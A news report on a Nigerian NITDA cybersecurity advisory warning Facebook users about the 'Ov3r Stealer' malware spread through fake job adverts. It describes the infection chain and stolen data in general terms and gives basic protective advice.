The National Information Technology (NITDA)’s Computer Emergency Readiness and Response Team (CERRT) has alerted Nigerians to a new malware attack identified as ‘Ov3r Steale’ targeting Facebook users.
The Agency in an advisory released on Monday said the new threat deceives Facebook users to click on malicious links under the guise of job advertisement. It then gains access to the users’ sensitive information and extracts their data for attacks.
What NITDA is saying
- In the threat alert released on Monday, the Agency in charge of technology regulation in Nigeria stated:
- “A new threat, known as “Ov3r Stealer” malware, has emerged, targeting users on Facebook, spreading through deceptive job advertisements and fake accounts.
- “Users become infected by clicking on these malicious advertisement links. The malware employs various execution methods to extract sensitive data from victims.
- “The Ov3r_Stealer malware can also be used as a dropper for other malware, including ransomware.”
The Impacts
NITDA added that when users click on the advertisement, they are redirected to a malicious Discord URL which executes the malware through a PowerShell script masquerading as a Windows Control Panel (CPL) file to download the malware payload from a GitHub repository.
- “Ov3r_Stealer poses a significant risk by silently exfiltrating a wide range of personal and sensitive information including geolocation (based on IP), hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Office documents, and antivirus product information.
- “This data is subsequently transmitted to a Telegram channel where it is possibly sold or used for phishing attacks,” NITDA added.
To guard against attacks, NITDA advised Nigerians to always ensure that their apps are always
updated. It added that Facebook users should also be wary of clicking on advertisement links, especially on social media platforms.
The Agency also urged Nigerians to ensure that their systems’ antivirus are updated regularly and ensure they stay updated on new and evolving threats.
What you should know
With social media becoming part of the daily lives of individuals and businesses, cybercriminals are now focusing more on using different social media platforms to attack and defraud users.
The most common way that malware infection occurs is by opening an attachment or clicking a link in a malicious email, which many people are familiar with – but what is not always considered is how easy it could be to click on an unsafe link in a social media platform, potentially granting access to devices and accounts on your network.
In 2022, Avast researchers discovered that a password stealer called Redline Stealer was being spread through hacked Facebook business pages in Brazil, Slovakia, and the Philippines.
The ISP Viu Internet from Brazil, which had 15,000 Facebook followers, had posts offering free downloads of tools, apps, wallpaper, and games that appeared on their page. By clicking to download, the user would instead get infected with Redline Stealer.